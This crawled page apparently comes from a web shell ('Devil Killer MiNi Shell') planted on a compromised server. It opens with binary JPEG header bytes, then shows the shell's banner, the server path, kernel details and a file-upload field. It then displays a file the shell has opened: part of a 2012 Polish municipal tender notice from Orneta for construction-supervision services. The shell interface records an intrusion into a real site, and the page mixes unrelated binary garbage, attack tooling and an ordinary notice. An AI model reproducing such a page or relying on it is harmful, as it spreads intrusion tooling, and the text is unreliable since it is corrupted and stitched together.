JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120203/32972-N-2012.html

<p class="kh_header"><b>Orneta: Pełnienie czynności nadzoru inwestorskiego na zadaniach:
Zadanie 1: Rozbudowa kanalizacji sanitarnej w miejscowości Bażyny wraz z przyłączami do gospodarstw
Zadanie 2: Przebudowa budynku kotłowni na  świetlicę wiejską w miejscowości Dąbrówka
Zadanie 3: Remont z przebudową budynku starej szkoły na Ośrodek Kultury w miejscowości Bażyny</b><br>
<b>Numer ogłoszenia: 32972 - 2012; data zamieszczenia: 03.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie czynności nadzoru inwestorskiego na zadaniach:
Zadanie 1: Rozbudowa kanalizacji sanitarnej w miejscowości Bażyny wraz z przyłączami do gospodarstw
Zadanie 2: Przebudowa budynku kotłowni na  świetlicę wiejską w miejscowości Dąbrówka
Zadanie 3: Remont z przebudową budynku starej szkoły na Ośrodek Kultury w miejscowości Bażyny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest: Pełnienie czynności nadzoru inwestorskiego na zadaniach: 
Zadanie 1: Rozbudowa kanalizacji sanitarnej w miejscowości Bażyny wraz z  przyłączami do gospodarstw
Zadanie 2: Przebudowa budynku kotłowni na  świetlicę wiejską w  miejscowości Dąbrówka
Zadanie 3: Remont z przebudową budynku starej szkoły na Ośrodek Kultury w miejscowości Bażyny
zwanych dalej Zadaniami
2.Zakres usługi pełnienia czynności nadzoru inwestorskiego na Zadaniach będzie realizowany w dwóch etapach: 
Etap I: Faza organizacji i wykonania robót budowlanych, sprawozdawczości, rozliczeń finansowych, odbiorów i oddania do użytkowania
Etap II:   Faza rękojmi za wady  i  gwarancji  jakości udzielonej przez Wykonawcę Robót
i  o b e j m u j e  :
1)zarządzanie procesem inwestycyjnym w imieniu i na rzecz Zamawiającego w ścisłej z nim współpracy mające na względzie prawidłowe realizowanie i ukończenie zadań, które będzie obejmowało w szczególności:
a)organizację,
b)koordynację,
c)nadzór,
d)monitoring, raportowanie i sprawozdawczość w zakresie rzeczowym, czasowym i finansowym, 
2)analizę dokumentacji projektowej dla zadania 1 i zadania 2 i zadania 3, zidentyfikowanie możliwych obszarów problemów i podjęcie działań zaradczych
3)ścisłą współpracę z autorami dokumentacji projektowej dla poszczególnych Zadań przy wykonywaniu  czynności  związanych z realizacją poszczególnych Zadań oraz  w zakresie sprawowanego przez  nich nadzoru autorskiego;
4)profesjonalny i kompetentny nadzór inwestorski nad robotami budowlanymi we wszystkich branżach  zgodnie z przepisami prawa obowiązującego w Polsce, w szczególności z ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn.: Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), poprzez wyznaczenie ze swego grona inspektorów nadzoru inwestorskiego (art.25 i art.26) i zapewnienie 
koordynacji ich pracy (art. 27); 
5)administrowanie i koordynowanie wszystkich Umów zawartych w ramach zadania 1 i zadania 2 i zadania 3
6)zarządzanie, monitorowanie i kontrolę postępu wykonania Umów z Wykonawcami Robót  pod względem organizacyjnym, technicznym,  czasowym i finansowym wraz z raportowaniem, które będzie uwzględniać zarówno wskaźniki fizyczne jak i finansowe, koszty, terminy, kontrolę budżetu i działania zapobiegawcze (jeśli będą konieczne). 
7)rozliczenie rzeczowe i finansowe (częściowe, końcowe) robót budowlanych dla zadania 1 i zadania 2 i zadania 3  zgodnie z warunkami określonymi w Umowach z Wykonawcą Robót. 
8)sporządzanie wniosków o płatność, ankiet monitorujących, raportów, sprawozdań, wniosków o  zmianę umowy o przyznanie pomocy,  aktualizację zestawień rzeczowo- finansowych  
9)natychmiastowe informowanie Zamawiającego o wszystkich zaistniałych problemach oraz o problemach mogących zaistnieć (w szczególności o wszelkich dostrzeżonych nieprawidłowościach i zagrożeniach co do jakości, zakresu i terminowości realizacji Umów na  wykonanie robót budowlanych), wraz ze sposobami ich rozwiązywania i/lub działaniami korygującymi mającymi na celu usuwanie takich problemów; 
10)wsparcie prawne w zakresie zaistniałych problemów na każdym etapie usługi pełnienia czynności nadzoru inwestorskiego na Zadaniach;
11)prowadzenie, przechowywanie i archiwizacja (również na nośniku elektronicznym) korespondencji z podmiotami biorącymi udział w realizacji Umów ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do wykonawcy robót budowlanych  mogących być dowodami w razie ewentualnych sporów, roszczeń wykonawcy robót, katastrof budowlanych itp.; 
12)polubowne rozstrzyganie wszelkich sporów powstałych pomiędzy stronami Umów; 
13)szacowanie i weryfikowanie jeśli zajdzie taka konieczność robót zamiennych i/lub uzupełniających i/lub dodatkowych  zaproponowanych przez Wykonawcę robót budowlanych, w zakresie wartości rzeczowych i finansowych, z uwzględnieniem konieczności stosowania przez Zamawiającego ustawy Prawo zamówień publicznych; 
14)prowadzenie technicznego, finansowego, czasowego i administracyjnego nadzoru nad robotami budowlanymi, egzekwowanie zgodności prowadzonych robót z: 
a)opracowanym przez Wykonawcę robót  Programem Zapewnienia Jakości Robót, 
b)pozwoleniem na budowę, pozwoleniem wodnoprawnym
c)projektem (budowlanym i wykonawczym), 
d)wszystkimi dokumentami stanowiącymi integralne części projektu
e)obowiązującym prawem, normami
f)zasadami wiedzy inżynierskiej, 
g)harmonogramem rzeczowo - finansowym dla poszczególnych Zadań sporządzonym przez Wykonawcę robót, 
h)warunkami umów zawartych przez Zamawiającego z: Wykonawcą Robót oraz umowami o przyznanie pomocy dla zadania 1 i zadania 2 i zadania 3  z Europejskiego Funduszu Rolnego w ramach Programu Rozwoju Obszarów Wiejskich;
15)realizacja zobowiązań, praw i obowiązków  Zamawiającego związanych z realizacją zadania 1 i zadania 2 i zadania 3 i wynikających w szczególności:
a)z umów o przyznanie pomocy zawartych przez Zamawiającego z Samorządem Województwa   Warmińsko-Mazurskim: 
-nr 00118-6921-UMI400023/11  z dnia 08.06.2011r  w ramach działania Podstawowe usługi dla  gospodarki i ludności wiejskiej objętego PROW na lata 2007-2013 dla zadania 1
-nr 00159-6922-UMI400279/10  z dnia 19.10.2010r  w ramach działania Odnowa i rozwój wsi  objętego PROW na lata 2007-2013 dla zadania 2
-nr 00067-6930-UMI430086/11  z dnia 18.04.10.2011r  w ramach  działania 413 Wdrażanie  lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007-2013 dla zadania 3
b)z wniosków o przyznanie pomocy dla  zadania 1 i zadania 2 i zadania 3  ze środków  Europejskiego Funduszu Rolnego w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 wraz z załącznikami, 
c) z obowiązujących przepisów prawa, w tym przepisów ustawy Prawo budowlane, ustawy  Prawo zamówień publicznych
16)wspierania działań Zamawiającego we wszystkich czynnościach organizacyjnych, technicznych, administracyjnych i finansowych w trakcie realizacji zadań  oraz związanych z realizacją i kontrolą zadań po ich zakończeniu przez służby kontrolne 
17)wykonywanie w imieniu i na rzecz Zamawiającego praw i obowiązków Zamawiającego z tytułu rękojmi i gwarancji w stosunku do Wykonawcy robót  przez okres:
a)5 lat (60 miesięcy) liczonych od daty zakończenia rzeczowego realizacji zadania 1 (daty podpisania końcowego protokołu odbioru);
b)3 lat (36 miesięcy) liczonych od daty zakończenia rzeczowego realizacji zadania 2 i 3 (daty podpisania końcowego protokołu odbioru);
18) występowanie w imieniu i na rzecz Zamawiającego przed organami administracji i przed sądami, w sprawach wynikających z realizacji Zadań, w granicach udzielonych pełnomocnictw;
19)udział, na żądanie Zamawiającego, w kontrolach dotyczących realizacji zadania 1 i zadania 2 i zadania 3, przeprowadzanych przez Samorząd Województwa oraz inne podmioty zewnętrzne uprawnione do jej przeprowadzenia na podstawie odrębnych przepisów m.in. podmiotów o których mowa  w umowach o przyznanie pomocy i przedstawianie na bieżąco  wszelkich informacji, dokumentów i wyjaśnień; 
20)stosowanie się do obowiązujących i aktualnych wzorów dokumentów oraz informacji zamieszczonych w szczególności na stronie internetowej Samorządu Województwa Warmińsko - Mazurskiego  w ramach realizacji zadania inwestycyjnego;
21)prowadzenie korespondencji związanej z realizacją zadania 1 i zadania 2 i zadania 3;
22)kontrolowanie prawidłowego prowadzenia dokumentów budowy,
23)gromadzenie, przechowywanie, ewidencjonowanie i zabezpieczanie dokumentacji związanej z realizacją zadania 1 i zadania 2 i zadania 3 (w tym między innymi: korespondencji, dokumentacji aplikacyjnej, monitoringowej, kontrolnej, fotograficznej z postępu robót, umów o przyznanie pomocy wraz z aneksami) oraz protokolarne przekazanie tej dokumentacji Zamawiającemu po zakończeniu Zadań lub rozwiązaniu umowy z Zamawiającym,
24)pełnienie czynności nadzoru inwestorskiego  zgodnie z przepisami polskiego prawa w tym: Prawa Budowlanego wraz z przepisami wykonawczymi, Prawa Zamówień Publicznych wraz z przepisami wykonawczymi, Kodeksu Cywilnego; 
25)udzielanie Zamawiającemu odpowiedzi - na piśmie, w terminie do 3 dni roboczych liczonych od dnia otrzymania wniosku, pisma lub innego dokumentu;
26)  zatwierdzenie przez Zamawiającego dokumentów i decyzji na każdym etapie pełnienia czynności nadzoru inwestorskiego,  nie zwalnia Wykonawcy  z odpowiedzialności za prawidłowość tych dokumentów i decyzji, w szczególności z rękojmi za wady, kar umownych
3.Szczegółowy zakres pełnienia czynności nadzoru inwestorskiego dla zadania 1 i zadania 2 i zadania 3 przedstawiony został w załączniku Nr 1 Szczegółowy  zakres  pełnienia czynności nadzoru inwestorskiego  Rozdziału  III  SIWZ  Opis przedmiotu   zamówienia, 
4.Zakres usługi pełnienia czynności nadzoru inwestorskiego wymieniony w ust. 2 niniejszego paragrafu  należy traktować łącznie ze szczegółowym zakresem pełnienia czynności nadzoru inwestorskiego  przedstawionym w Załączniku nr 1 Szczegółowy  zakres  pełnienia czynności nadzoru inwestorskiego Rozdziału III  SIWZ Opis przedmiotu zamówienia
5.Opis i  wartość szacunkowa  zadania 1 i zadania 2 i zadania 3 przedstawione zostały w § 2 Opisu przedmiotu zamówienia  Rozdziału III SIWZ Opis  przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 71.52.00.00-9, 71.54.00.00-5, 71.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże, że:  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie co najmniej:
a)1 usługę polegającą na pełnieniu funkcji nadzoru inwestorskiego, inżyniera kontraktu lub/i inwestora zastępczego lub/i  inspektora nadzoru inwestorskiego nad  realizacją umowy/ów na roboty budowlane, przy robotach  polegających na budowie, rozbudowie,  przebudowie lub remoncie budynków o  wartości brutto robót budowlanych  co najmniej  1 500 000 zł   
b)1 usługę polegającą na pełnieniu funkcji nadzoru inwestorskiego, inżyniera kontraktu lub/i inwestora zastępczego lub/i  inspektora nadzoru inwestorskiego nad  realizacją umowy/ów na roboty budowlane, przy robotach  polegających na budowie, rozbudowie lub  przebudowie kanalizacji sanitarnej lub deszczowej o  wartości brutto robót budowlanych co  najmniej  1 400 000 zł   
Za usługi wykonane rozumie się takie, w ramach których nadzorowane kontrakty na roboty budowlane / inwestycje zostały zakończone tj. dla nadzorowanych robót  budowlanych zostały wydane protokoły odbioru robót, Świadectwa Przejęcia lub inne dokumenty o równoważnym  znaczeniu.
Ocena spełnienia warunku  nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych  w  § 6 ust. 1 pkt 2 IDW tj Wykazu wykonanych usług w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie podaniem ich  wartości, przedmiotu , dat  wykonania i odbiorców sporządzonego wg Załącznika nr 5 do IDW wraz z dołączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osobami odpowiedzialnymi za świadczenie usługi,  kontrolę jakości, kierowanie robotami budowlanymi  tj. dysponuje lub będzie dysponował osobami na pełnienie co najmniej n/w funkcji:
a)1 Kierownik Zespołu Nadzoru Inwestorskiego posiadający:
-   wykształcenie wyższe techniczne; 
-   co najmniej  5-letnie doświadczenie zawodowe na stanowiskach kierowniczych w
bezpośrednim kierowaniu,  zarządzaniu lub nadzorowaniu realizacji inwestycji budowlanych 
-   doświadczenie na stanowisku kierowniczym (np. w pełnieniu funkcji Kierownika  Zespołu Nadzoru inwestorskiego lub/i Kierownika  Zespołu Inżyniera i/lub Kierownika Projektu lub/i Inżyniera Rezydenta lub/i kierownika budowy lub/i kierownik robót  itp.) przy realizacji co najmniej dwóch zakończonych  inwestycji 
b) 1 inspektor nadzoru inwestorskiego (branża konstrukcyjno - budowlana) posiadający: 
-   wykształcenie wyższe techniczne
-   min. 5 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w budownictwie jako inspektor nadzoru  i/lub kierownik budowy, kierownik robót 
-   uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej  obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa,   
c) 1 inspektor nadzoru inwestorskiego (branża sanitarna) posiadający: 
-   wykształcenie wyższe
-   min. 5 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w  budownictwie jako inspektor nadzoru  i/lub kierownik budowy, kierownik robót
-   uprawnienia  budowlane w specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń kanalizacyjnych  bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane  na podstawie wcześniej  obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa  , 
d) 1 inspektor nadzoru inwestorskiego (branża sanitarna) posiadający: 
-   wykształcenie średnie, wyższe
-   min. 5 letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w budownictwie jako inspektor nadzoru  i/lub kierownik budowy, kierownik robót
-   uprawnienia  budowlane w specjalności instalacyjnej w  zakresie instalacji wodociągowej, kanalizacyjnej i cieplnej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane  na podstawie wcześniej  obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa  , 
e) 1 inspektor nadzoru inwestorskiego (branża elektryczna) posiadający:
-   wykształcenie średnie, wyższe
-   min 5 letnie  doświadczenie zawodowe w pełnieniu samodzielnej funkcji technicznej w budownictwie jako inspektor nadzoru i/lub kierownik budowy, kierownik robót
-   uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych lub  odpowiadające  im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa   
f) 1 specjalista do spraw rozliczeń inwestycji posiadający: 
-   wykształcenie średnie lub wyższe 
-   co najmniej 2 lata doświadczenia na stanowisku związanym z rozliczaniem inwestycji              
-   doświadczenie w rozliczeniu dokumentacyjno - finansowym ( w tym: m.in. sporządzaniu wniosków o płatność, zestawień rzeczowo - finansowych),  sprawozdawczości  w zakresie co najmniej jednej zakończonej inwestycji 
-   doświadczenie w kosztorysowaniu, obmiarach oraz korzystaniu z przedmiarów robót w  robotach budowlanych w zakresie co najmniej jednej zakończonej inwestycji 
UWAGA: 
1)  Przez doświadczenie zawodowe (w przypadku stanowisk, dla których wymagane jest posiadanie uprawnień budowlanych) należy rozumieć okres od daty uzyskania stosownych uprawnień do daty składania oferty.
2)   Zamawiający dopuszcza łączenie maksymalnie 2 funkcji przez 1 osobę w  przypadku, gdy przewidziana przez Wykonawcę dana osoba posiada łącznie wymagane: kwalifikacje zawodowe, wykształcenie i  doświadczenie zawodowe. 
3)  Osoby będące obywatelami krajów członkowskich Unii Europejskiej, a wskazane jako osoby od których wymagane są stosowne uprawnienia budowlane, powinny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia - zgodnie z Ustawą z dnia 18 marca 2008r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z 2008 roku nr 63, poz.394).
Ocena spełnienia warunku nastąpi nas podstawie załączonych przez wykonawcę do oferty   dokumentów i oświadczeń wymienionych w § 6 ust. 1 pkt 3 i 4  IDW tj Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia sporządzonego wg  Załącznika nr 6 i 6.1 do IDW, oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia wymienione w  załączniku nr 6 do IDW posiadają wymagane uprawnienia sporządzonego wg załącznika nr 6.2 do IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zmawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj  Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>
